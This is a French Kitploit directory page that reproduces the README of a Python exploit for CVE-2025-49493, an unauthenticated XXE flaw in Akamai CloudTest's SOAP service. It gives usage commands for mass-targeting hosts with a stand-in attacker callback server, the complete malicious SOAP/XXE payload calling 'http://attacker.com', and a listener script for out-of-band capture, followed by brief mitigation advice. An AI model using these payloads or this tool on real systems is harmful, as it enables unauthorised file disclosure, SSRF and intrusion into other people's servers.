Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49493 — Ceci est un exploit basé sur Python pour CVE-2025-49493, qui affecte les versions d'Akamai CloudTest antérieures à 60 2025.06.02 (12988). La vulnérabilité permet une injection d'entité externe XML (XXE) via le point de terminaison du service SOAP. | Kitploit
Outils/GitHubGitHub/sh4den/cve-2025-49493
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubsh4den/cve-2025-49493

CVE-2025-49493

Ceci est un exploit basé sur Python pour CVE-2025-49493, qui affecte les versions d'Akamai CloudTest antérieures à 60 2025.06.02 (12988). La vulnérabilité permet une injection d'entité externe XML (XXE) via le point de terminaison du service SOAP.

Voir le dépôt
12il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit XXE Akamai CloudTest (CVE-2025-49493)

Aperçu

Il s'agit d'un exploit basé sur Python pour CVE-2025-49493, qui affecte les versions d'Akamai CloudTest antérieures à 60 2025.06.02 (12988). La vulnérabilité permet l'injection d'entités externes XML (XXE) via le point de terminaison du service SOAP.

Détails de la vulnérabilité

  • ID CVE : CVE-2025-49493
  • Type de vulnérabilité : Injection d'entités externes XML (XXE)
  • Sévérité : Critique (CVSS 9.1)
  • Logiciel concerné : Akamai CloudTest
  • Versions concernées : Avant 60 2025.06.02 (12988)
  • Vecteur d'attaque : Réseau
  • Authentification requise : Non

Détails techniques

La vulnérabilité existe dans le point de terminaison SOAP /concerto/services/RepositoryService où l'entrée XML est traitée sans désinfection appropriée des entités externes. Un attaquant peut élaborer des charges utiles XML malveillantes pour déclencher des attaques XXE, pouvant conduire à :

  • Divulgation d'informations
  • SSRF (Falsification de requête côté serveur)
  • Déni de service
  • RCE potentiel dans certaines configurations

Fonctionnalités

  • Découverte de cibles : Identifie automatiquement les instances d'Akamai CloudTest
  • Détection de vulnérabilités : Vérifie les points de terminaison et indicateurs vulnérables
  • Exploitation XXE : Envoie des requêtes SOAP conçues avec des charges utiles XXE
  • Cibles multiples : Prend en charge le traitement par lots à partir de fichiers de cibles
  • Journalisation détaillée : Journalisation colorée complète avec horodatages
  • Gestion des erreurs : Gestion robuste des erreurs pour les problèmes réseau

Installation

Prérequis

  • Python 3.6 ou supérieur
  • Gestionnaire de paquets pip

Dépendances

Installer les paquets requis :

root@kitploit:~
pip install -r requirements.txt

Ou installer manuellement :

root@kitploit:~
pip install requests urllib3 colored pyfiglet

Utilisation

Utilisation de base

root@kitploit:~
python main.py targets.txt xxe.attacker.com

Utilisation avancée

root@kitploit:~
# Avec un délai d'expiration personnalisé
python main.py targets.txt collaborator.burp.com --timeout 20

# Utilisation d'interactsh pour la détection OOB
python main.py targets.txt attacker.interactsh.com

Options de la ligne de commande

root@kitploit:~
arguments positionnels :
  targets              Fichier de cibles contenant la liste des hôtes Akamai CloudTest
  xxe_server          Serveur XXE pour capturer les requêtes (ex. : attacker.com ou IP)

arguments optionnels :
  -h, --help          affiche ce message d'aide et quitte
  --timeout TIMEOUT   Délai d'expiration de la requête en secondes (par défaut : 10)

Format du fichier de cibles

Créez un fichier targets.txt avec une cible par ligne :

root@kitploit:~
https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org

Configuration du serveur XXE

Option 1 : Utilisation de Burp Collaborator

  1. Ouvrez Burp Suite Professional
  2. Allez dans Burp > Client Burp Collaborator
  3. Cliquez sur "Copier dans le presse-papiers" pour obtenir votre URL collaborator
  4. Utilisez cette URL comme paramètre xxe_server

Option 2 : Utilisation d'Interactsh

  1. Installez interactsh : go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
  2. Exécutez : interactsh-client
  3. Utilisez l'URL fournie comme paramètre xxe_server

Option 3 : Serveur HTTP personnalisé

Mettez en place un serveur HTTP simple pour capturer les requêtes :

root@kitploit:~
# simple_server.py
import http.server
import socketserver

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(f"XXE Request received: {self.path}")
        print(f"Headers: {self.headers}")
        super().do_GET()

with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
    print("Server running on port 8000")
    httpd.serve_forever()

Déroulement de l'exploit

  1. Validation de la cible : Valide le format de l'URL et l'accessibilité
  2. Détection de vulnérabilité :
    • Vérifie les indicateurs CloudTest dans la réponse
    • Vérifie l'existence du point de terminaison du service SOAP
  3. Génération de la charge utile XXE : Crée une enveloppe SOAP malveillante avec XXE
  4. Exploitation : Envoie une requête conçue au point de terminaison vulnérable
  5. Analyse des résultats : Analyse la réponse pour les indicateurs de succès

Structure de la charge utile XXE

L'exploit utilise la structure de charge utile XXE suivante :

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
   <soapenv:Header/>
   <soapenv:Body>
      <rep:getUIBundleObjectXml>
         <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
      </rep:getUIBundleObjectXml>
   </soapenv:Body>
</soapenv:Envelope>

Atténuation

Pour les administrateurs

  1. Actions immédiates :

    • Mettez à jour Akamai CloudTest vers la version 60 2025.06.02 ou ultérieure
    • Surveillez les journaux pour les activités suspectes de traitement XML
    • Mettez en place une segmentation réseau pour limiter l'exposition
  2. Solutions à long terme :

    • Désactivez le traitement des entités externes XML dans les analyseurs XML
    • Mettez en place une validation et une désinfection des entrées
    • Utilisez des listes autorisées pour le traitement XML
    • Évaluations régulières de la sécurité

Pour les développeurs

  1. Traitement XML sécurisé :

    root@kitploit:~
    # Disable external entities in XML parsers
    import xml.etree.ElementTree as ET
    parser = ET.XMLParser()
    parser.parser.DefaultHandler = lambda data: None
    parser.parser.ExternalEntityRefHandler = lambda *args: False
    
  2. Validation des entrées :

    • Validez toutes les entrées XML par rapport à des schémas stricts
    • Désinfectez les données contrôlées par l'utilisateur avant le traitement XML
    • Mettez en place une gestion d'erreurs appropriée

Références

  • Recherche originale par xbow
  • Journal des modifications d'Akamai CloudTest
  • Détails de CVE-2025-49493
  • Prévention XXE par OWASP

Avertissement légal

Cet outil est fourni uniquement à des fins éducatives et de tests autorisés. Les utilisateurs sont responsables de s'assurer qu'ils disposent des autorisations appropriées avant de tester tout système. Les auteurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par cet outil.

Contribution

  1. Forkez le dépôt
  2. Créez une branche de fonctionnalité
  3. Apportez vos modifications
  4. Ajoutez des tests si applicable
  5. Soumettez une pull request

Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

Auteurs

  • Recherche originale : xbow, 3th1c_yuk1
  • Développement de l'exploit : Security Research Team
  • Attribution CVE : CVE-2025-49493

Journal des modifications

v1.0.0

  • Version initiale
  • Fonctionnalité d'exploitation XXE de base
  • Prise en charge des fichiers de cibles
  • Journalisation complète
  • Améliorations de la gestion des erreurs
Télécharger l’outil